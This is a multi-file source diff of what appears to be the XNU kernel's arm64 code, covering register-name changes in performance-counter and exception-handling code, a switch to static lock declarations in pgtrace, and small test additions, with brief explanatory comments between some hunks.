                UPMC_ALL(UPMC_WR, count);
 #undef UPMC_WR
        default:
@@ -632,12 +579,10 @@ uncmon_program_events_locked_l(unsigned int monid)
         * UPMESR[01] is the event selection register that determines which event a
         * counter will count.
         */
-#define UPMESR0 "s3_7_c15_c1_4"
-       CTRL_REG_SET(UPMESR0, uncore_config.uc_events.uce_regs[0]);
+       CTRL_REG_SET("UPMESR0_EL1", uncore_config.uc_events.uce_regs[0]);
 
 #if UNCORE_NCTRS > 8
-#define UPMESR1 "s3_7_c15_c11_5"
-       CTRL_REG_SET(UPMESR1, uncore_config.uc_events.uce_regs[1]);
+       CTRL_REG_SET("UPMESR1_EL1", uncore_config.uc_events.uce_regs[1]);
 #endif /* UNCORE_NCTRS > 8 */
 
        /*
@@ -649,21 +594,15 @@ uncmon_program_events_locked_l(unsigned int monid)
         * has a CPU ID of 4, it might be the first CPU in a cluster.  Shift the
         * registers right by the ID of the first CPU in the cluster.
         */
-#define UPMECM0 "s3_7_c15_c3_4"
-#define UPMECM1 "s3_7_c15_c4_4"
-
-       CTRL_REG_SET(UPMECM0,
+       CTRL_REG_SET("UPMECM0_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[0]);
-       CTRL_REG_SET(UPMECM1,
+       CTRL_REG_SET("UPMECM1_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[1]);
 
 #if UNCORE_NCTRS > 8
-#define UPMECM2 "s3_7_c15_c8_5"
-#define UPMECM3 "s3_7_c15_c9_5"
-
-       CTRL_REG_SET(UPMECM2,
+       CTRL_REG_SET("UPMECM2_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[2]);
-       CTRL_REG_SET(UPMECM3,
+       CTRL_REG_SET("UPMECM3_EL1",
            uncore_config.uc_cpu_masks[monid].uccm_regs[3]);
 #endif /* UNCORE_NCTRS > 8 */
 }
@@ -697,7 +636,7 @@ uncmon_program_events_locked_r(unsigned int monid)
 static void
 uncmon_clear_int_locked_l(__unused unsigned int monid)
 {
-       __builtin_arm_wsr64(UPMSR, 0);
+       __builtin_arm_wsr64("UPMSR_EL1", 0);
 }
 
 #if UNCORE_PER_CLUSTER
@@ -740,7 +679,7 @@ uncmon_init_locked_l(unsigned int monid)
         * UPMPCM defines the PMI core mask for the UPMCs -- which cores should
         * receive interrupts on overflow.
         */
-       CTRL_REG_SET(UPMPCM, uncmon_get_pmi_mask(monid));
+       CTRL_REG_SET("UPMPCM_EL1", uncmon_get_pmi_mask(monid));
        uncmon_set_counting_locked_l(monid,
            mt_uncore_enabled ? uncore_active_ctrs : 0);
 }
@@ -821,7 +760,7 @@ uncore_init(__unused mt_device_t dev)
 #endif /* UNCORE_PER_CLUSTER */
 
                struct uncore_monitor *mon = &uncore_monitors[monid];
-               lck_spin_init(&mon->um_lock, mt_lock_grp, NULL);
+               lck_spin_init(&mon->um_lock, &mt_lock_grp, LCK_ATTR_NULL);
 
                int intrs_en = uncmon_lock(mon);
                if (monid != curmonid) {
@@ -1261,7 +1200,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
        assert(cpu != NULL);
        assert(ml_get_interrupts_enabled() == FALSE);
 
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
        /*
         * Ensure the CPMU has flushed any increments at this point, so PMSR is up
         * to date.
@@ -1280,7 +1219,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
 #pragma unused(pmcr0)
 #endif /* !MONOTONIC_DEBUG */
 
-       uint64_t pmsr = __builtin_arm_rsr64(PMSR);
+       uint64_t pmsr = __builtin_arm_rsr64("PMSR_EL1");
 
 #if MONOTONIC_DEBUG
        printf("monotonic: cpu = %d, PMSR = 0x%llx, PMCR0 = 0x%llx\n",
@@ -1336,7 +1275,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
        }
 
 #if MACH_ASSERT
-       uint64_t pmsr_after_handling = __builtin_arm_rsr64(PMSR);
+       uint64_t pmsr_after_handling = __builtin_arm_rsr64("PMSR_EL1");
        if (pmsr_after_handling != 0) {
                unsigned int first_ctr_ovf = __builtin_ffsll(pmsr_after_handling) - 1;
                uint64_t count = 0;
@@ -1350,7 +1289,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0)
                panic("monotonic: PMI status not cleared on exit from handler, "
                    "PMSR = 0x%llx HANDLE -> -> 0x%llx, handled 0x%llx, "
                    "PMCR0 = 0x%llx, PMC%d = 0x%llx%s", pmsr, pmsr_after_handling,
-                   handled, __builtin_arm_rsr64(PMCR0), first_ctr_ovf, count, extra);
+                   handled, __builtin_arm_rsr64("PMCR0_EL1"), first_ctr_ovf, count, extra);
        }
 #endif /* MACH_ASSERT */
 
@@ -1366,7 +1305,7 @@ mt_cpmu_aic_pmi(cpu_id_t source)
                panic("monotonic: PMI from IOCPU %p delivered to %p", source,
                    curcpu->interrupt_nub);
        }
-       mt_cpu_pmi(curcpu, __builtin_arm_rsr64(PMCR0));
+       mt_cpu_pmi(curcpu, __builtin_arm_rsr64("PMCR0_EL1"));
 }
 #endif /* CPMU_AIC_PMI */
 
@@ -1393,7 +1332,7 @@ mt_microstackshot_start_remote(__unused void *arg)
 {
        cpu_data_t *cpu = getCpuDatap();
 
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
 
        for (int i = 0; i < MT_CORE_NFIXED; i++) {
                uint64_t count = mt_cpu_update_count(cpu, i);
index d13c8415bd2b1b436ea2104435779246011e3d60..d9b2d634c6faee3a29345e18be9ef1e532fc6b24 100644 (file)
@@ -70,7 +70,6 @@ static struct {
        log_t           *logs;          // Protect
        uint32_t        size;           // Protect
        uint64_t        rdidx, wridx;   // Protect
-       decl_simple_lock_data(, loglock);
 
        uint64_t id;
        uint32_t option;
@@ -78,12 +77,11 @@ static struct {
        uint32_t bytes;
 
        queue_head_t    probes;         // Protect
+} pgtrace;
 
-       lck_grp_t       *lock_grp;
-       lck_grp_attr_t  *lock_grp_attr;
-       lck_attr_t      *lock_attr;
-       lck_mtx_t       probelock;
-} pgtrace = {};
+static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock");
+static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp);
+static SIMPLE_LOCK_DECLARE(pgtrace_loglock, 0);
 
 //--------------------------------------------
 // Globals
@@ -91,14 +89,6 @@ static struct {
 void
 pgtrace_init(void)
 {
-       simple_lock_init(&pgtrace.loglock, 0);
-
-       pgtrace.lock_attr = lck_attr_alloc_init();
-       pgtrace.lock_grp_attr = lck_grp_attr_alloc_init();
-       pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr);
-
-       lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr);
-
        queue_init(&pgtrace.probes);
 
        pgtrace.size = RBUF_DEFAULT_SIZE;
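This hunk, together with the matching one in the second pgtrace variant below, drops the runtime lck_grp_alloc_init()/lck_mtx_init() sequence in favor of the static LCK_GRP_DECLARE/LCK_MTX_DECLARE/SIMPLE_LOCK_DECLARE initializers added above. A generic sketch of the pattern with a hypothetical subsystem name (only the macros and lock calls that appear in this diff are assumed):

/* Hypothetical subsystem "foo": statically declared locks replace the
 * lck_grp_alloc_init()/lck_mtx_init() calls that used to run in foo_init(). */
static LCK_GRP_DECLARE(foo_lock_grp, "foo_lock");
static LCK_MTX_DECLARE(foo_lock, &foo_lock_grp);

static void
foo_do_work(void)
{
	lck_mtx_lock(&foo_lock);
	/* ... touch foo's shared state ... */
	lck_mtx_unlock(&foo_lock);
}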
@@ -111,7 +101,7 @@ pgtrace_clear_probe(void)
        probe_t *p, *next;
        queue_head_t *q = &pgtrace.probes;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        p = (probe_t *)queue_first(q);
        while (!queue_end(q, (queue_entry_t)p)) {
@@ -123,9 +113,7 @@ pgtrace_clear_probe(void)
                p = next;
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 int
@@ -148,9 +136,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end)
                p->pmap = vm_map_pmap(thread->map);
        }
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
        queue_enter(q, p, probe_t *, chain);
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        return 0;
 }
@@ -169,15 +157,13 @@ pgtrace_start(void)
 
        pgtrace.enabled = 1;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_add_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -188,13 +174,13 @@ pgtrace_stop(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_delete_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        pgtrace.enabled = 0;
 }
@@ -229,13 +215,13 @@ pgtrace_set_size(uint32_t size)
 
        pgtrace_stop();
 
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
        old_buf = pgtrace.logs;
        old_size = pgtrace.size;
        pgtrace.logs = new_buf;
        pgtrace.size = new_size;
        pgtrace.rdidx = pgtrace.wridx = 0;
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
 
        if (old_buf) {
                kfree(old_buf, old_size * sizeof(log_t));
@@ -247,9 +233,9 @@ pgtrace_set_size(uint32_t size)
 void
 pgtrace_clear_trace(void)
 {
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
        pgtrace.rdidx = pgtrace.wridx = 0;
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
 }
 
 boolean_t
@@ -304,7 +290,7 @@ pgtrace_write_log(pgtrace_run_result_t res)
 
        pgtrace.bytes += sizeof(log);
 
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
 
        pgtrace.logs[RBUF_IDX(pgtrace.wridx, pgtrace.size - 1)] = log;
 
@@ -320,9 +306,7 @@ pgtrace_write_log(pgtrace_run_result_t res)
                thread_wakeup(pgtrace.logs);
        }
 
-       simple_unlock(&pgtrace.loglock);
-
-       return;
+       simple_unlock(&pgtrace_loglock);
 }
 
 // pgtrace_read_log() is in user thread
@@ -345,13 +329,13 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
        }
 
        ints = ml_set_interrupts_enabled(FALSE);
-       simple_lock(&pgtrace.loglock);
+       simple_lock(&pgtrace_loglock);
 
        // Wait if ring is empty
        if (pgtrace.rdidx == pgtrace.wridx) {
                assert_wait(pgtrace.logs, THREAD_ABORTSAFE);
 
-               simple_unlock(&pgtrace.loglock);
+               simple_unlock(&pgtrace_loglock);
                ml_set_interrupts_enabled(ints);
 
                wr = thread_block(NULL);
@@ -360,7 +344,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
                }
 
                ints = ml_set_interrupts_enabled(FALSE);
-               simple_lock(&pgtrace.loglock);
+               simple_lock(&pgtrace_loglock);
        }
 
        // Trim the size
@@ -386,7 +370,7 @@ pgtrace_read_log(uint8_t *buf, uint32_t size)
 
        pgtrace.rdidx += total;
 
-       simple_unlock(&pgtrace.loglock);
+       simple_unlock(&pgtrace_loglock);
        ml_set_interrupts_enabled(ints);
 
        return total * sizeof(log_t);
@@ -412,12 +396,10 @@ static struct {
        decoder_t       *decoder;
        logger_t        *logger;
        queue_head_t    probes;
+} pgtrace;
 
-       lck_grp_t       *lock_grp;
-       lck_grp_attr_t  *lock_grp_attr;
-       lck_attr_t      *lock_attr;
-       lck_mtx_t       probelock;
-} pgtrace = {};
+static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock");
+static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp);
 
 //------------------------------------
 // functions for pmap fault handler
@@ -482,12 +464,6 @@ pgtrace_init(decoder_t *decoder, logger_t *logger)
                return EINVAL;
        }
 
-       pgtrace.lock_attr = lck_attr_alloc_init();
-       pgtrace.lock_grp_attr = lck_grp_attr_alloc_init();
-       pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr);
-
-       lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr);
-
        queue_init(&pgtrace.probes);
        pgtrace.decoder = decoder;
        pgtrace.logger = logger;
@@ -517,9 +493,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end)
                p->pmap = vm_map_pmap(thread->map);
        }
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
        queue_enter(q, p, probe_t *, chain);
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        return 0;
 }
@@ -532,7 +508,7 @@ pgtrace_clear_probe(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        p = (probe_t *)queue_first(q);
        while (!queue_end(q, (queue_entry_t)p)) {
@@ -544,9 +520,7 @@ pgtrace_clear_probe(void)
                p = next;
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -563,15 +537,13 @@ pgtrace_start(void)
 
        pgtrace.active = true;
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_add_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
-
-       return;
+       lck_mtx_unlock(&pgtrace_probelock);
 }
 
 void
@@ -582,13 +554,13 @@ pgtrace_stop(void)
 
        kprintf("%s\n", __func__);
 
-       lck_mtx_lock(&pgtrace.probelock);
+       lck_mtx_lock(&pgtrace_probelock);
 
        queue_iterate(q, p, probe_t *, chain) {
                pmap_pgtrace_delete_page(p->pmap, p->start, p->end);
        }
 
-       lck_mtx_unlock(&pgtrace.probelock);
+       lck_mtx_unlock(&pgtrace_probelock);
 
        pgtrace.active = false;
 }
index 37eb2dda12ff00014e80d8448b97412dc8b4e6dd..f05b33b2d93b8a0da373ca1f70498b5842472917 100644 (file)
@@ -1050,6 +1050,7 @@ struct munger_test {
        {MT_FUNC(munge_wws), 3, 3, {MT_W_VAL, MT_W_VAL, MT_S_VAL}},
        {MT_FUNC(munge_wwwsw), 5, 5, {MT_W_VAL, MT_W_VAL, MT_W_VAL, MT_S_VAL, MT_W_VAL}},
        {MT_FUNC(munge_llllll), 12, 6, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}},
+       {MT_FUNC(munge_llll), 8, 4, {MT_L_VAL, MT_L_VAL, MT_L_VAL, MT_L_VAL}},
        {MT_FUNC(munge_l), 2, 1, {MT_L_VAL}},
        {MT_FUNC(munge_lw), 3, 2, {MT_L_VAL, MT_W_VAL}},
        {MT_FUNC(munge_lwww), 5, 4, {MT_L_VAL, MT_W_VAL, MT_W_VAL, MT_W_VAL}},
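In this test table the second and third fields appear to be the number of 32-bit input words and the number of munged arguments, so the new munge_llll row (8 words in, 4 arguments out) lines up with the existing munge_llllll entry (12 in, 6 out). As a rough conceptual sketch of what an "llll" munger does (hypothetical; the real mungers rewrite the uthread argument area in place):

/* Rough sketch only: pack eight 32-bit input words into four 64-bit
 * arguments, low word first, as an "llll" signature implies on arm64. */
static void
munge_llll_sketch(const uint32_t in[8], uint64_t out[4])
{
	for (int i = 0; i < 4; i++) {
		out[i] = ((uint64_t)in[2 * i + 1] << 32) | in[2 * i];
	}
}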
@@ -1183,16 +1184,16 @@ arm64_ropjop_test()
 
        if (config_jop_enabled) {
                /* jop key */
-               uint64_t apiakey_hi = __builtin_arm_rsr64(ARM64_REG_APIAKEYHI_EL1);
-               uint64_t apiakey_lo = __builtin_arm_rsr64(ARM64_REG_APIAKEYLO_EL1);
+               uint64_t apiakey_hi = __builtin_arm_rsr64("APIAKEYHI_EL1");
+               uint64_t apiakey_lo = __builtin_arm_rsr64("APIAKEYLO_EL1");
 
                T_EXPECT(apiakey_hi != 0 && apiakey_lo != 0, NULL);
        }
 
        if (config_rop_enabled) {
                /* rop key */
-               uint64_t apibkey_hi = __builtin_arm_rsr64(ARM64_REG_APIBKEYHI_EL1);
-               uint64_t apibkey_lo = __builtin_arm_rsr64(ARM64_REG_APIBKEYLO_EL1);
+               uint64_t apibkey_hi = __builtin_arm_rsr64("APIBKEYHI_EL1");
+               uint64_t apibkey_lo = __builtin_arm_rsr64("APIBKEYLO_EL1");
 
                T_EXPECT(apibkey_hi != 0 && apibkey_lo != 0, NULL);
 
@@ -1617,13 +1618,13 @@ arm64_spr_lock_test()
                thread_block(THREAD_CONTINUE_NULL);
                T_LOG("Running SPR lock test on cpu %d\n", p->cpu_id);
 
-               uint64_t orig_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8));
+               uint64_t orig_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0));
                spr_lock_test_addr = (vm_offset_t)VM_KERNEL_STRIP_PTR(arm64_msr_lock_test);
                spr_lock_exception_esr = 0;
                arm64_msr_lock_test(~orig_value);
                T_EXPECT(spr_lock_exception_esr != 0, "MSR write generated synchronous abort");
 
-               uint64_t new_value = __builtin_arm_rsr64(STR(ARM64_REG_HID8));
+               uint64_t new_value = __builtin_arm_rsr64(STR(S3_0_C15_C8_0));
                T_EXPECT(orig_value == new_value, "MSR write did not succeed");
 
                spr_lock_test_addr = 0;
index 5ec159e482a13f95a69db341f68447f12be509e4..7b41b508362d08dd5466e349320a603ddf99b00b 100644 (file)
@@ -34,6 +34,6 @@
        .align 2
        .globl EXT(arm64_msr_lock_test)
 LEXT(arm64_msr_lock_test)
-       msr             ARM64_REG_HID8, x0
+       msr             S3_0_C15_C8_0, x0
        ret
 #endif
index 307027f7c455f8b704e12fa0d3696169e5898c55..545142ba414bc24566d703351de6c1d61210a251 100644 (file)
 #define ARM_PTE_NX                 0x0040000000000000ULL /* value for no execute bit */
 #define ARM_PTE_NXMASK             0x0040000000000000ULL /* no execute mask */
 
+#define ARM_PTE_XMASK              (ARM_PTE_PNXMASK | ARM_PTE_NXMASK)
+
 #define ARM_PTE_WIRED              0x0400000000000000ULL /* value for software wired bit */
 #define ARM_PTE_WIRED_MASK         0x0400000000000000ULL /* software wired mask */
 
@@ -2057,6 +2059,19 @@ b.ne 1f
 1:
 .endmacro
 
+/*
+ * Wedges CPUs of the specified core type that are below the specified revision.  This
+ * macro is intended for CPUs that have been deprecated in iBoot and may have
+ * incorrect behavior if they continue running xnu.
+ */
+.macro DEPRECATE_COREEQ_REVLO   core, rev, midr_el1, scratch
+EXEC_COREEQ_REVLO \core, \rev, \midr_el1, \scratch
+/* BEGIN IGNORE CODESTYLE */
+b .
+/* END IGNORE CODESTYLE */
+EXEC_END
+.endmacro
+
 /*
  * Sets bits in an SPR register.
  * arg0: Name of the register to be accessed.
index 51bd6a69b438a5c8576e60236957aad66866e6bc..a84e319f88c7496515a23aca6a83c7ce10e4bc62 100644 (file)
@@ -68,6 +68,7 @@
 
 
 
+
 #ifndef __arm64__
 #error Should only be compiling for arm64.
 #endif
@@ -109,6 +110,9 @@ void panic_with_thread_kernel_state(const char *msg, arm_saved_state_t *ss) __ab
 
 void sleh_synchronous_sp1(arm_context_t *, uint32_t, vm_offset_t) __abortlike;
 void sleh_synchronous(arm_context_t *, uint32_t, vm_offset_t);
+
+
+
 void sleh_irq(arm_saved_state_t *);
 void sleh_fiq(arm_saved_state_t *);
 void sleh_serror(arm_context_t *context, uint32_t esr, vm_offset_t far);
@@ -324,12 +328,12 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
 #if defined(NO_ECORE)
        uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf;
 
-       mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-       l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
-       lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-       fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+       mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+       l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
+       lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+       fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p\n"
@@ -343,13 +347,13 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
        uint64_t l2c_err_sts, l2c_err_adr, l2c_err_inf, mpidr, migsts;
 
        mpidr = __builtin_arm_rsr64("MPIDR_EL1");
-       migsts = __builtin_arm_rsr64(STR(ARM64_REG_MIGSTS_EL1));
-       mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-       l2c_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       l2c_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       l2c_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
-       lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-       fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+       migsts = __builtin_arm_rsr64(STR(MIGSTS_EL1));
+       mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+       l2c_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       l2c_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       l2c_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
+       lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+       fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p p-core?%d migsts=%p\n"
@@ -361,24 +365,24 @@ arm64_implementation_specific_error(arm_saved_state_t *state, uint32_t esr, vm_o
 #else // !defined(NO_ECORE) && !defined(HAS_MIGSTS)
        uint64_t llc_err_sts, llc_err_adr, llc_err_inf, mpidr;
 #if defined(HAS_DPC_ERR)
-       uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_DPC_ERR_STS));
+       uint64_t dpc_err_sts = __builtin_arm_rsr64(STR(S3_5_C15_C0_5));
 #endif // defined(HAS_DPC_ERR)
 
        mpidr = __builtin_arm_rsr64("MPIDR_EL1");
 
        if (mpidr & MPIDR_PNE) {
-               mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_MMU_ERR_STS));
-               lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_LSU_ERR_STS));
-               fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_FED_ERR_STS));
+               mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C0_0));
+               lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C0_0));
+               fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_0));
        } else {
-               mmu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_MMU_ERR_STS));
-               lsu_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_LSU_ERR_STS));
-               fed_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_E_FED_ERR_STS));
+               mmu_err_sts = __builtin_arm_rsr64(STR(S3_6_C15_C2_0));
+               lsu_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C2_0));
+               fed_err_sts = __builtin_arm_rsr64(STR(S3_4_C15_C0_2));
        }
 
-       llc_err_sts = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_STS));
-       llc_err_adr = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_ADR));
-       llc_err_inf = __builtin_arm_rsr64(STR(ARM64_REG_L2C_ERR_INF));
+       llc_err_sts = __builtin_arm_rsr64(STR(S3_3_C15_C8_0));
+       llc_err_adr = __builtin_arm_rsr64(STR(S3_3_C15_C9_0));
+       llc_err_inf = __builtin_arm_rsr64(STR(S3_3_C15_C10_0));
 
        panic_plain("Unhandled " CPU_NAME
            " implementation specific error. state=%p esr=%#x far=%p p-core?%d"
@@ -555,7 +559,7 @@ __attribute__((__always_inline__))
 static inline void
 task_vtimer_check(thread_t thread)
 {
-       if (__improbable(thread->task->vtimers)) {
+       if (__improbable((thread->task != NULL) && thread->task->vtimers)) {
                thread->ast |= AST_BSD;
                thread->machine.CpuDatap->cpu_pending_ast |= AST_BSD;
        }
@@ -893,6 +897,7 @@ handle_uncategorized(arm_saved_state_t *state)
                         */
                        DebuggerCall(exception, state);
 
+                       current_thread()->machine.kpcb = NULL;
                        (void) ml_set_interrupts_enabled(interrupt_state);
                        return;
                } else {
@@ -1292,9 +1297,9 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr
        thread->iotier_override = THROTTLE_LEVEL_NONE; /* Reset IO tier override before handling abort from userspace */
 
        if (is_vm_fault(fault_code)) {
-               kern_return_t   result = KERN_FAILURE;
                vm_map_t        map = thread->map;
                vm_offset_t     vm_fault_addr = fault_addr;
+               kern_return_t   result = KERN_FAILURE;
 
                assert(map != kernel_map);
 
@@ -1330,21 +1335,22 @@ handle_user_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_addr
                        }
                }
 #endif
-
                /* check to see if it is just a pmap ref/modify fault */
 
-               if ((result != KERN_SUCCESS) && !is_translation_fault(fault_code)) {
+               if (!is_translation_fault(fault_code)) {
                        result = arm_fast_fault(map->pmap,
                            vm_fault_addr,
                            fault_type, (fault_code == FSC_ACCESS_FLAG_FAULT_L3), TRUE);
                }
-               if (result != KERN_SUCCESS) {
-                       {
-                               /* We have to fault the page in */
-                               result = vm_fault(map, vm_fault_addr, fault_type,
-                                   /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE,
-                                   /* caller_pmap */ NULL, /* caller_pmap_addr */ 0);
-                       }
+               if (result == KERN_SUCCESS) {
+                       return;
+               }
+
+               {
+                       /* We have to fault the page in */
+                       result = vm_fault(map, vm_fault_addr, fault_type,
+                           /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE,
+                           /* caller_pmap */ NULL, /* caller_pmap_addr */ 0);
                }
                if (result == KERN_SUCCESS || result == KERN_ABORTED) {
                        return;
@@ -1519,7 +1525,15 @@ handle_kernel_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_ad
                        interruptible = THREAD_UNINT;
                } else {
                        map = thread->map;
-                       interruptible = THREAD_ABORTSAFE;
+
+                       /**
+                        * In the case that the recovery handler is set (e.g., during copyio
+                        * and dtrace probes), we don't want the vm_fault() operation to be
+                        * aborted early. Those code paths can't handle restarting the
+                        * vm_fault() operation so don't allow it to return early without
+                        * creating the wanted mapping.
+                        */
+                       interruptible = (recover) ? THREAD_UNINT : THREAD_ABORTSAFE;
                }
 
 #if CONFIG_PGTRACE
@@ -1629,10 +1643,11 @@ handle_svc(arm_saved_state_t *state)
        mach_kauth_cred_uthread_update();
 
        if (trap_no < 0) {
-               if (trap_no == MACH_ARM_TRAP_ABSTIME) {
+               switch (trap_no) {
+               case MACH_ARM_TRAP_ABSTIME:
                        handle_mach_absolute_time_trap(state);
                        return;
-               } else if (trap_no == MACH_ARM_TRAP_CONTTIME) {
+               case MACH_ARM_TRAP_CONTTIME:
                        handle_mach_continuous_time_trap(state);
                        return;
                }
@@ -1665,6 +1680,7 @@ handle_mach_continuous_time_trap(arm_saved_state_t *state)
        saved_state64(state)->x[0] = now;
 }
 
+
 __attribute__((noreturn))
 static void
 handle_msr_trap(arm_saved_state_t *state, uint32_t esr)
@@ -1780,7 +1796,7 @@ sleh_fiq(arm_saved_state_t *state)
        uint64_t     ipi_sr = 0;
 
        if (gFastIPI) {
-               MRS(ipi_sr, ARM64_REG_IPI_SR);
+               MRS(ipi_sr, "S3_5_C15_C1_1");
 
                if (ipi_sr & 1) {
                        is_ipi = TRUE;
@@ -1802,6 +1818,7 @@ sleh_fiq(arm_saved_state_t *state)
 
        sleh_interrupt_handler_prologue(state, type);
 
+
 #if defined(HAS_IPI)
        if (is_ipi) {
                /*
@@ -1812,7 +1829,7 @@ sleh_fiq(arm_saved_state_t *state)
